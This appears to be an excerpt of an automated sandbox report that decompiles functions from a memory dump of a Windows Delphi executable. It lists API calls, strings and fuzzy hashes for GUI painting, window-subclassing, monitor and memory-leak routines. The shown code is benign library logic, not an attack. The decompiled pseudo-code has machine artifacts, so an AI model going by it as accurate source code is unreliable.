                                                                            • DeleteDC.GDI32(?), ref: 00426D6C
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                                            • String ID:
                                                                            • API String ID: 644427674-0
                                                                            • Opcode ID: 248f97220b1dff338e82754563a8b2f4f32af0637ae63b0437187d055089408d
                                                                            • Instruction ID: f7b92c2e99590a9d5cfcba79e299e5576af21b756abce57799db81c34b4bedf2
                                                                            • Opcode Fuzzy Hash: 248f97220b1dff338e82754563a8b2f4f32af0637ae63b0437187d055089408d
                                                                            • Instruction Fuzzy Hash: AC41F271F04219AFDB10EBE9D841FAFB7BCEB09704F524466B614F7281C67959108B68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E004073BC(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
    intOrPtr* _v8;
    struct HWND__* _t19;
    int* _t20;
    int* _t26;
    int* _t27;

    _t26 = _t20;
    _t27 = __edx;
    _v8 = __eax;
    _t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
    *_v8 = RegisterWindowMessageA("MSWHEEL_ROLLMSG");
    *_t27 = RegisterWindowMessageA("MSH_WHEELSUPPORT_MSG");
    *_t26 = RegisterWindowMessageA("MSH_SCROLL_LINES_MSG");
    if( *_t27 == 0 || _t19 == 0) {
        *_a8 = 0;
    } else {
        *_a8 = SendMessageA(_t19, *_t27, 0, 0);
    }
    if( *_t26 == 0 || _t19 == 0) {
        *_a4 = 3;
    } else {
        *_a4 = SendMessageA(_t19, *_t26, 0, 0);
    }
    return _t19;
}


                                                                            APIs
                                                                            • FindWindowA.USER32 ref: 004073D4
                                                                            • RegisterWindowMessageA.USER32(MSWHEEL_ROLLMSG,MouseZ,Magellan MSWHEEL), ref: 004073E0
                                                                            • RegisterWindowMessageA.USER32(MSH_WHEELSUPPORT_MSG,MSWHEEL_ROLLMSG,MouseZ,Magellan MSWHEEL), ref: 004073EF
                                                                            • RegisterWindowMessageA.USER32(MSH_SCROLL_LINES_MSG,MSH_WHEELSUPPORT_MSG,MSWHEEL_ROLLMSG,MouseZ,Magellan MSWHEEL), ref: 004073FB
                                                                            • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00407413
                                                                            • SendMessageA.USER32(00000000,?,00000000,00000000), ref: 00407437
                                                                            Strings
                                                                            • Magellan MSWHEEL , xrefs: 004073CA
                                                                            • MSH_WHEELSUPPORT_MSG , xrefs: 004073EA
                                                                            • MSWHEEL_ROLLMSG , xrefs: 004073DB
                                                                            • MouseZ , xrefs: 004073CF
                                                                            • MSH_SCROLL_LINES_MSG , xrefs: 004073F6
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Message$Window$Register$Send$Find
                                                                            • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                                                            • API String ID: 3569030445-3736581797
                                                                            • Opcode ID: 10a1feeb794df7440b17b8e63e4a13679fef9cef35fe56b70c938976079f5b51
                                                                            • Instruction ID: c9e55c20fdb79de714cfc477ac30daadf041c9ce3ed2a91509b04cc45838add5
                                                                            • Opcode Fuzzy Hash: 10a1feeb794df7440b17b8e63e4a13679fef9cef35fe56b70c938976079f5b51
                                                                            • Instruction Fuzzy Hash: 9A111F70A48305AFE710AF65CC81B66BBA8EF45714F204177F944AB3C1D6B86D418B6A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 59%
E0042E248(void* __eax, void* __ecx, intOrPtr __edx) {
    intOrPtr _v8;
    struct HDC__* _v12;
    struct tagRECT _v28;
    struct tagRECT _v44;
    char _v56;
    char _v72;
    signed char _t43;
    signed int _t79;
    int _t80;
    int _t81;
    void* _t94;
    intOrPtr _t107;
    void* _t116;
    void* _t119;
    void* _t122;
    void* _t124;
    intOrPtr _t125;

    _t122 = _t124;
    _t125 = _t124 + 0xffffffbc;
    _t94 = __ecx;
    _v8 = __edx;
    _t116 = __eax;
    _t43 = GetWindowLongA(E004423F8(_v8), 0xffffffec);
    if((_t43 & 0x00000002) == 0) {
        return _t43;
    } else {
        GetWindowRect(E004423F8(_v8), &_v44);
        OffsetRect( &_v44, ~(_v44.left), ~(_v44.top));
        _v12 = GetWindowDC(E004423F8(_v8));
        _push(_t122);
        _push(0x42e3a3);
        _push( *[fs:edx]);
        *[fs:edx] = _t125;
        asm("movsd");
        asm("movsd");
        asm("movsd");
        asm("movsd");
        _t119 = _t116;
        if(_t94 != 0) {
            _t79 = GetWindowLongA(E004423F8(_v8), 0xfffffff0);
            if((_t79 & 0x00100000) != 0 && (_t79 & 0x00200000) != 0) {
                _t80 = GetSystemMetrics("true");
                _t81 = GetSystemMetrics(3);
                InflateRect( &_v28, 0xfffffffe, 0xfffffffe);
                E004193B4(_v28.right - _t80, _v28.right, _v28.bottom - _t81, &_v72, _v28.bottom);
                asm("movsd");
                asm("movsd");
                asm("movsd");
                asm("movsd");
                _t119 = _t119;
                FillRect(_v12, &_v28, GetSysColorBrush(0xf));
            }
        }
        ExcludeClipRect(_v12, _v44.left + 2, _v44.top + 2, _v44.right - 2, _v44.bottom - 2);
        E0042DDE4( &_v56, 2);
        E0042DD38(_t119, &_v56, _v12, 0, &_v44);
        _pop(_t107);
        *[fs:eax] = _t107;
        _push(0x42e3aa);
        return ReleaseDC(E004423F8(_v8), _v12);
    }
}


                                                                            APIs
                                                                            • GetWindowLongA.USER32 ref: 0042E263
                                                                            • GetWindowRect.USER32 ref: 0042E27E
                                                                            • OffsetRect.USER32(?,?,?), ref: 0042E293
                                                                            • GetWindowDC.USER32(00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0042E2A1
                                                                            • GetWindowLongA.USER32 ref: 0042E2D2
                                                                            • GetSystemMetrics.USER32 ref: 0042E2E7
                                                                            • GetSystemMetrics.USER32 ref: 0042E2F0
                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 0042E2FF
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 0042E32C
                                                                            • FillRect.USER32 ref: 0042E33A
                                                                            • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,0042E3A3,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0042E35F
                                                                            • ReleaseDC.USER32 ref: 0042E39D
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Rect$Window$LongMetricsSystem$BrushClipColorExcludeFillInflateOffsetRelease
                                                                            • String ID:
                                                                            • API String ID: 19621357-0
                                                                            • Opcode ID: b5feca34c5e02f2c05eb31ab0b62325e3b1cc387764e0298675f37e714cee0b3
                                                                            • Instruction ID: 957c21c96a165308dc8ebfbd5cc34ddb946f70638fe63c8bb3f5cff5665369c4
                                                                            • Opcode Fuzzy Hash: b5feca34c5e02f2c05eb31ab0b62325e3b1cc387764e0298675f37e714cee0b3
                                                                            • Instruction Fuzzy Hash: 71413371E04119ABDB00EBA9DD42EDFB7BDEF49314F500166F914F7281CA79AE018764
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 98%
E0040262C(void* __eax, void* __fp0) {
    void* _v8;
    char _v110600;
    char _v112644;
    char _v112645;
    signed int _v112652;
    char _v112653;
    char _v112654;
    char _v112660;
    intOrPtr _v112664;
    intOrPtr _v112668;
    intOrPtr _v112672;
    struct HWND__* _v112676;
    signed short* _v112680;
    intOrPtr* _v112684;
    char _v129068;
    char _v131117;
    char _v161836;
    void* _v162091;
    signed char _v162092;
    void* _t73;
    int _t79;
    signed int _t126;
    int _t131;
    intOrPtr _t132;
    char* _t134;
    char* _t135;
    char* _t136;
    char* _t137;
    char* _t138;
    char* _t139;
    char* _t141;
    char* _t142;
    char* _t147;
    char* _t148;
    intOrPtr _t180;
    void* _t182;
    void* _t184;
    void* _t185;
    intOrPtr* _t188;
    intOrPtr* _t189;
    signed int _t194;
    void* _t197;
    void* _t198;
    void* _t211;

    _push(__eax);
    _t73 = 0x27;
    goto L1;
    L12:
    while(_t180 != 0x463708) {
        _t79 = E00402144(_t180);
        _t131 = _t79;
        __eflags = _t131;
        if(_t131 == 0) {
            L11:
            _t180 = *((intOrPtr*)(_t180 + 4));
            continue;
        } else {
            goto L4;
        }
        do {
            L4:
            _t194 = *(_t131 - 4);
            __eflags = _t194 & 0x00000001;
            if((_t194 & 0x00000001) == 0) {
                __eflags = _t194 & 0x00000004;
                if(__eflags == 0) {
                    __eflags = _v112652 - 0x1000;
                    if(_v112652 < 0x1000) {
                        _v112664 = (_t194 & 0xfffffff0) - 4;
                        _t126 = E00402488(_t131);
                        __eflags = _t126;
                        if(_t126 == 0) {
                            _v112645 = 0;
                            *((intOrPtr*)(_t197 + _v112652 * 4 - 0x1f828)) = _v112664;
                            _t18 = &_v112652;
                            *_t18 = _v112652 + 1;
                            __eflags = *_t18;
                        }
                    }
                } else {
                    E004024E0(_t131, __eflags, _t197);
                }
            }
            _t79 = E00402120(_t131);
            _t131 = _t79;
            __eflags = _t131;
        } while (_t131 != 0);
        goto L11;
    }
    _t132 = *0x4657b0; // 0x4657ac
    while(_t132 != 0x4657ac && _v112652 < 0x1000) {
        _t79 = E00402488(_t132 + 0x10);
        __eflags = _t79;
        if(_t79 == 0) {
            _v112645 = 0;
            _t22 = _t132 + 0xc; // 0x0
            _t79 = _v112652;
            *((intOrPtr*)(_t197 + _t79 * 4 - 0x1f828)) = ( *_t22 & 0xfffffff0) - 0xfffffffffffffff4;
            _t27 = &_v112652;
            *_t27 = _v112652 + 1;
            __eflags = *_t27;
        }
        _t29 = _t132 + 4; // 0x4657ac
        _t132 = *_t29;
    }
    if(_v112645 != 0) {
        L48:
        return _t79;
    }
    _v112653 = 0;
    _v112668 = 0;
    _t134 = E004022DC(0x28, &_v161836);
    _v112660 = 0x37;
    _v112680 = 0x46103e;
    _v112684 = &_v110600;
    do {
        _v112672 = ( *_v112680 & 0x0000ffff) - 4;
        _v112654 = 0;
        _t182 = 0xff;
        _t188 = _v112684;
        while(_t134 <= &_v131117) {
            if( *_t188 > 0) {
                if(_v112653 == 0) {
                    _t134 = E004022DC(0x27, _t134);
                    _v112653 = 1;
                }
                if(_v112654 != 0) {
                    *_t134 = 0x2c;
                    _t139 = _t134 + 1;
                    *_t139 = 0x20;
                    _t140 = _t139 + 1;
                    __eflags = _t139 + 1;
                } else {
                    *_t134 = 0xd;
                    *((char*)(_t134 + 1)) = 0xa;
                    _t147 = E004021C0(_v112668 + 1, _t134 + 2);
                    *_t147 = 0x20;
                    _t148 = _t147 + 1;
                    *_t148 = 0x2d;
                    *((char*)(_t148 + 1)) = 0x20;
                    _t140 = E004022DC(8, E004021C0(_v112672, _t148 + 2));
                    _v112654 = 1;
                }
                _t211 = _t182 - 1;
                if(_t211 < 0) {
                    _t141 = E004022DC(7, _t140);
                } else {
                    if(_t211 == 0) {
                        _t141 = E004022DC(6, _t140);
                    } else {
                        E00403808( *((intOrPtr*)(_t188 - 4)), &_v162092);
                        _t141 = E004022DC(_v162092 & 0x000000ff, _t140);
                    }
                }
                *_t141 = 0x20;
                _t142 = _t141 + 1;
                *_t142 = 0x78;
                *((char*)(_t142 + 1)) = 0x20;
                _t134 = E004021C0( *_t188, _t142 + 2);
            }
            _t182 = _t182 - 1;
            _t188 = _t188 - 8;
            if(_t182 != 0xffffffff) {
                continue;
            } else {
                goto L37;
            }
        }
        L37:
        _v112668 = _v112672;
        _v112684 = _v112684 + 0x800;
        _v112680 = &(_v112680[0x10]);
        _t60 = &_v112660;
        *_t60 = _v112660 - 1;
    } while ( *_t60 != 0);
    if(_v112652 <= 0) {
        L47:
        E004022DC(3, _t134);
        _t79 = MessageBoxA(0, &_v161836, "Unexpected Memory Leak", 0x2010);
        goto L48;
    }
    if(_v112653 != 0) {
        *_t134 = 0xd;
        _t136 = _t134 + 1;
        *_t136 = 0xa;
        _t137 = _t136 + 1;
        *_t137 = 0xd;
        _t138 = _t137 + 1;
        *_t138 = 0xa;
        _t134 = _t138 + 1;
    }
    _t134 = E004022DC(0x3c, _t134);
    _t184 = _v112652 - 1;
    if(_t184 >= 0) {
        _t185 = _t184 + 1;
        _v112676 = 0;
        _t189 = &_v129068;
        L43:
        L43:
        if(_v112676 != 0) {
            *_t134 = 0x2c;
            _t135 = _t134 + 1;
            *_t135 = 0x20;
            _t134 = _t135 + 1;
        }
        _t134 = E004021C0( *_t189, _t134);
        if(_t134 > &_v131117) {
            goto L47;
        }
        _v112676 = &(_v112676->i);
        _t189 = _t189 + 4;
        _t185 = _t185 - 1;
        if(_t185 != 0) {
            goto L43;
        }
    }
    L1:
    _t198 = _t198 + 0xfffff004;
    _push(_t73);
    _t73 = _t73 - 1;
    if(_t73 != 0) {
        goto L1;
    } else {
        E00403264( &_v112644, 0x1b800);
        E00403264( &_v129068, 0x4000);
        _t79 = 0;
        _v112652 = 0;
        _v112645 = 1;
        _t180 = *0x46370c; // 0x26c0000
        goto L12;
    }
}


                                                                            APIs
                                                                            • MessageBoxA.USER32 ref: 004029CA
                                                                            Strings
                                                                            • 7 , xrefs: 0040279D
                                                                            • bytes: , xrefs: 00402859
                                                                            • The unexpected small block leaks are: , xrefs: 00402803
                                                                            • String , xrefs: 0040289D
                                                                            • Unknown , xrefs: 00402888
                                                                            • , xrefs: 00402910
                                                                            • An unexpected memory leak has occurred. , xrefs: 0040278C
                                                                            • The sizes of unexpected leaked medium and large blocks are: , xrefs: 00402945
                                                                            • Unexpected Memory Leak , xrefs: 004029BC
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Message
                                                                            • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                            • API String ID: 2030045667-32948583
                                                                            • Opcode ID: beafdac069818b89e0087070b96c1ea8355f0caf45c0914c33fec503f38985e1
                                                                            • Instruction ID: 23a8accc11e2490a14215b8d9e6836f2a0164065a38b33aa7325ad77d19b5dc4
                                                                            • Opcode Fuzzy Hash: beafdac069818b89e0087070b96c1ea8355f0caf45c0914c33fec503f38985e1
                                                                            • Instruction Fuzzy Hash: 14A1D930B042548BDF21AA2DC988BD976E5EB09314F1441FAE449BB3C2DBFD89C5CB59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 88%
E0042328C(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
    struct tagPOINT _v12;
    int _v16;
    struct tagRECT _v32;
    struct tagRECT _v48;
    void* __ebx;
    void* __edi;
    void* __esi;
    void* __ebp;
    void* _t60;
    int _t61;
    RECT* _t64;
    struct HDC__* _t65;

    _t64 = _a8;
    _t65 = _a4;
    if( *0x46633f != 0) {
        _t61 = 0;
        if(_a12 == 0) {
            L14:
            return _t61;
        }
        _v32.left = 0;
        _v32.top = 0;
        _v32.right = GetSystemMetrics(0);
        _v32.bottom = GetSystemMetrics(1);
        if(_t65 == 0) {
            if(_t64 == 0 || IntersectRect( &_v32, &_v32, _t64) != 0) {
                L13:
                _t61 = _a12(0x12340042, _t65, &_v32, _a16);
            } else {
                _t61 = 1;
            }
            goto L14;
        }
        _v16 = GetClipBox(_t65, &_v48);
        if(GetDCOrgEx(_t65, &_v12) == 0) {
            goto L14;
        }
        OffsetRect( &_v32, ~(_v12.x), ~(_v12.y));
        if(IntersectRect( &_v32, &_v32, &_v48) == 0 || _t64 != 0) {
            if(IntersectRect( &_v32, &_v32, _t64) != 0) {
                goto L13;
            }
            if(_v16 == 1) {
                _t61 = 1;
            }
            goto L14;
        } else {
            goto L13;
        }
    }
    *0x46632c = E00422CE4(7, _t60, *0x46632c, _t64, _t65);
    _t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
    goto L14;
}


                                                                            APIs
                                                                            • EnumDisplayMonitors.USER32(?,?,?,?), ref: 004232C5
                                                                            • GetSystemMetrics.USER32 ref: 004232EA
                                                                            • GetSystemMetrics.USER32 ref: 004232F5
                                                                            • GetClipBox.GDI32(?,?), ref: 00423307
                                                                            • GetDCOrgEx.GDI32(?,?), ref: 00423314
                                                                            • OffsetRect.USER32(?,?,?), ref: 0042332D
                                                                            • IntersectRect.USER32 ref: 0042333E
                                                                            • IntersectRect.USER32 ref: 00423354
                                                                              • Part of subcall function 00422CE4: GetProcAddress.KERNEL32(768F0000,00000000), ref: 00422D63
                                                                            Strings
                                                                            • EnumDisplayMonitors , xrefs: 004232A4
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                                                                            • String ID: EnumDisplayMonitors
                                                                            • API String ID: 362875416-2491903729
                                                                            • Opcode ID: f7d0f23d6495af1ec55020b5116113e54d63a9552e5b96eaa14a23c035d380cf
                                                                            • Instruction ID: d52a89dab7af035f148b809b0392693c774d2fc3562edf481713e1b8ae1df2d7
                                                                            • Opcode Fuzzy Hash: f7d0f23d6495af1ec55020b5116113e54d63a9552e5b96eaa14a23c035d380cf
                                                                            • Instruction Fuzzy Hash: 82312C72E04219AFDB10DFA598449EFB7BCAB09315F40412BFD11E2241EB7CDB018BA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 88%
E004403A0(intOrPtr* __eax, void* __edx) {
    struct HDC__* _v8;
    struct HBITMAP__* _v12;
    void* _v16;
    struct tagPAINTSTRUCT _v80;
    int _v84;
    void* _v96;
    int _v104;
    void* _v112;
    void* __ebx;
    void* __edi;
    void* __esi;
    void* __ebp;
    void* _t38;
    struct HDC__* _t59;
    intOrPtr* _t88;
    intOrPtr _t107;
    void* _t108;
    struct HDC__* _t110;
    void* _t113;
    void* _t116;
    void* _t118;
    intOrPtr _t119;

    _t116 = _t118;
    _t119 = _t118 + 0xffffff94;
    _push(_t108);
    _t113 = __edx;
    _t88 = __eax;
    if( *((char*)(__eax + 0x240)) == 0 || *((intOrPtr*)(__edx + 4)) != 0) {
        if(( *(_t88 + 0x55) & 0x00000001) != 0 || E0043E7F4(_t88) != 0) {
            _t38 = E0043FDA8(_t88, _t88, _t113, _t108, _t113);
        } else {
            _t38 = *((intOrPtr*)( *_t88 - 0x10))();
        }
        return _t38;
    } else {
        _t110 = GetDC(0);
        *((intOrPtr*)( *_t88 + 0x44))();
        *((intOrPtr*)( *_t88 + 0x44))();
        _v12 = CreateCompatibleBitmap(_t110, _v104, _v84);
        ReleaseDC(0, _t110);
        _v8 = CreateCompatibleDC(0);
        _v16 = SelectObject(_v8, _v12);
        *[fs:eax] = _t119;
        _t59 = BeginPaint(E004423F8(_t88), &_v80);
        E0043BC9C(_t88, _v8, 0x14, _v8);
        *((intOrPtr*)(_t113 + 4)) = _v8;
        E004403A0(_t88, _t113);
        *((intOrPtr*)(_t113 + 4)) = 0;
        *((intOrPtr*)( *_t88 + 0x44))( *[fs:eax], 0x4404f2, _t116);
        *((intOrPtr*)( *_t88 + 0x44))();
        BitBlt(_t59, 0, 0, _v104, _v84, _v8, 0, 0, 0xcc0020);
        EndPaint(E004423F8(_t88), &_v80);
        _pop(_t107);
        *[fs:eax] = _t107;
        _push(0x4404f9);
        SelectObject(_v8, _v16);
        DeleteDC(_v8);
        return DeleteObject(_v12);
    }
}


                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 004403EB
                                                                            • CreateCompatibleBitmap.GDI32(00000000,?), ref: 0044040F
                                                                            • ReleaseDC.USER32 ref: 0044041A
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00440421
                                                                            • SelectObject.GDI32(00000000,?), ref: 00440431
                                                                            • BeginPaint.USER32(00000000,?,00000000,004404F2,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 00440453
                                                                            • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 004404AF
                                                                            • EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 004404C0
                                                                            • SelectObject.GDI32(00000000,?), ref: 004404DA
                                                                            • DeleteDC.GDI32(00000000), ref: 004404E3
                                                                            • DeleteObject.GDI32(?), ref: 004404EC
                                                                              • Part of subcall function 0043FDA8: BeginPaint.USER32(00000000,?), ref: 0043FDD3
                                                                              • Part of subcall function 0043FDA8: EndPaint.USER32(00000000,?,0043FF0E), ref: 0043FF01
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Paint$Object$BeginCompatibleCreateDeleteSelect$BitmapRelease
                                                                            • String ID:
                                                                            • API String ID: 3867285559-0
                                                                            • Opcode ID: eba5fdd7ba86c248c310541572c712ce7591c9252fd8a16b30174db8949f5770
                                                                            • Instruction ID: 4919ca747627bef7842d7ed575d7896ae0b3c9884536c9da749fdf441052b200
                                                                            • Opcode Fuzzy Hash: eba5fdd7ba86c248c310541572c712ce7591c9252fd8a16b30174db8949f5770
                                                                            • Instruction Fuzzy Hash: C1414171B00204AFDB10EFA9CD85F9EB7F8EF49704F10447ABA05EB281DA789D158B54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E00437338(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
    char _v8;
    void* _t29;
    void* _t32;
    void* _t38;
    void* _t42;
    void* _t46;
    void* _t54;
    intOrPtr* _t65;

    _t65 = &_v8;
    _t29 = *0x462560; // 0x0
    *((intOrPtr*)(_t29 + 0x1b4)) = _a4;
    if(IsWindowUnicode(_a4) == 0) {
        _t32 = *0x462560; // 0x0
        SetWindowLongA(_a4, 0xfffffffc, *(_t32 + 0x1c0));
        if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
            SetWindowLongA(_a4, 0xfffffff4, _a4);
        }
    } else {
        _t54 = *0x462560; // 0x0
        SetWindowLongW(_a4, 0xfffffffc, *(_t54 + 0x1c0));
        if((GetWindowLongW(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongW(_a4, 0xfffffff4) == 0) {
            SetWindowLongW(_a4, 0xfffffff4, _a4);
        }
    }
    _t38 = *0x462560; // 0x0
    SetPropA(_a4, *0x466502 & 0x0000ffff, _t38);
    _t42 = *0x462560; // 0x0
    SetPropA(_a4, *0x466500 & 0x0000ffff, _t42);
    _t46 = *0x462560; // 0x0
    *0x462560 = 0;
    _v8 = *((intOrPtr*)(_t46 + 0x1c0))(_a4, _a8, _a12, _a16);
    return *_t65;
}


                                                                            APIs
                                                                            • IsWindowUnicode.USER32(?), ref: 00437352
                                                                            • SetWindowLongW.USER32 ref: 0043736D
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00437378
                                                                            • GetWindowLongW.USER32(?,000000F4), ref: 0043738A
                                                                            • SetWindowLongW.USER32 ref: 0043739D
                                                                            • SetWindowLongA.USER32(?,000000FC,?), ref: 004373B6
                                                                            • GetWindowLongA.USER32 ref: 004373C1
                                                                            • GetWindowLongA.USER32 ref: 004373D3
                                                                            • SetWindowLongA.USER32(?,000000F4,?), ref: 004373E6
                                                                            • SetPropA.USER32 ref: 004373FD
                                                                            • SetPropA.USER32 ref: 00437414
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Window$Long$Prop$Unicode
                                                                            • String ID:
                                                                            • API String ID: 1693715928-0
                                                                            • Opcode ID: 9cb3877dccd50f0c78dc4fa0fa98952b877eedb7963e8443561684603e94e979
                                                                            • Instruction ID: 055e33e178d5362de7fb404685cd59e59f5cb0b042dc790f1cdf86eecf1274db
                                                                            • Opcode Fuzzy Hash: 9cb3877dccd50f0c78dc4fa0fa98952b877eedb7963e8443561684603e94e979
                                                                            • Instruction Fuzzy Hash: 62316075608248BBDF10DFA9DD84E9A37ACBB08354F104266FD14DB2E1D378EA40CB65
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 82%
E0043EA40(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
    char _v68;
    struct _WNDCLASSA _v108;
    intOrPtr _v116;
    signed char _v137;
    void* _v144;
    struct _WNDCLASSA _v184;
    char _v188;
    char _v192;
    char _v196;
    int _t52;
    void* _t53;
    intOrPtr _t86;
    intOrPtr _t105;
    intOrPtr _t109;
    void* _t110;
    intOrPtr* _t112;
    void* _t116;

    _t110 = __edi;
    _t94 = __ebx;
    _push(__ebx);
    _push(__esi);
    _v196 = 0;
    _t112 = __eax;
    _push(_t116);
    _push(0x43ec01);
    _push( *[fs:eax]);
    *[fs:eax] = _t116 + 0xffffff40;
    *((intOrPtr*)( *__eax + 0x9c))();
    if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
        L7:
        *((intOrPtr*)(_t112 + 0x1a8)) = _v108.lpfnWndProc;
        _t52 = GetClassInfoA(_v108.hInstance, &_v68, &_v184);
        asm("sbb eax, eax");
        _t53 = _t52 + 1;
        if(_t53 == 0 || E00437338 != _v184.lpfnWndProc) {
            if(_t53 != 0) {
                UnregisterClassA( &_v68, _v108.hInstance);
            }
            _v108.lpfnWndProc = E00437338;
            _v108.lpszClassName = &_v68;
            if(RegisterClassA( &_v108) == 0) {
                E0040D764();
            }
        }
        *0x462560 = _t112;
        _t96 = *_t112;
        *((intOrPtr*)( *_t112 + 0xa0))();
        if( *(_t112 + 0x1b4) == 0) {
            E0040D764();
        }
        if((GetWindowLongA( *(_t112 + 0x1b4), 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA( *(_t112 + 0x1b4), 0xfffffff4) == 0) {
            SetWindowLongA( *(_t112 + 0x1b4), 0xfffffff4, *(_t112 + 0x1b4));
        }
        E0040927C( *((intOrPtr*)(_t112 + 0x64)));
        *((intOrPtr*)(_t112 + 0x64)) = 0;
        E00442700(_t112);
        E0043BC9C(_t112, E0042590C( *((intOrPtr*)(_t112 + 0x68)), _t94, _t96, _t110, _t112), 0x30, 1);
        _t131 = *((char*)(_t112 + 0x5c));
        if( *((char*)(_t112 + 0x5c)) != 0) {
            E00403B24(_t112, _t131);
        }
        _pop(_t105);
        *[fs:eax] = _t105;
        _push(0x43ec08);
        return E0040473C( &_v196);
    } else {
        _t94 = *((intOrPtr*)(__eax + 4));
        if(_t94 == 0 || ( *(_t94 + 0x1c) & 0x00000002) == 0) {
            L6:
            _v192 = *((intOrPtr*)(_t112 + 8));
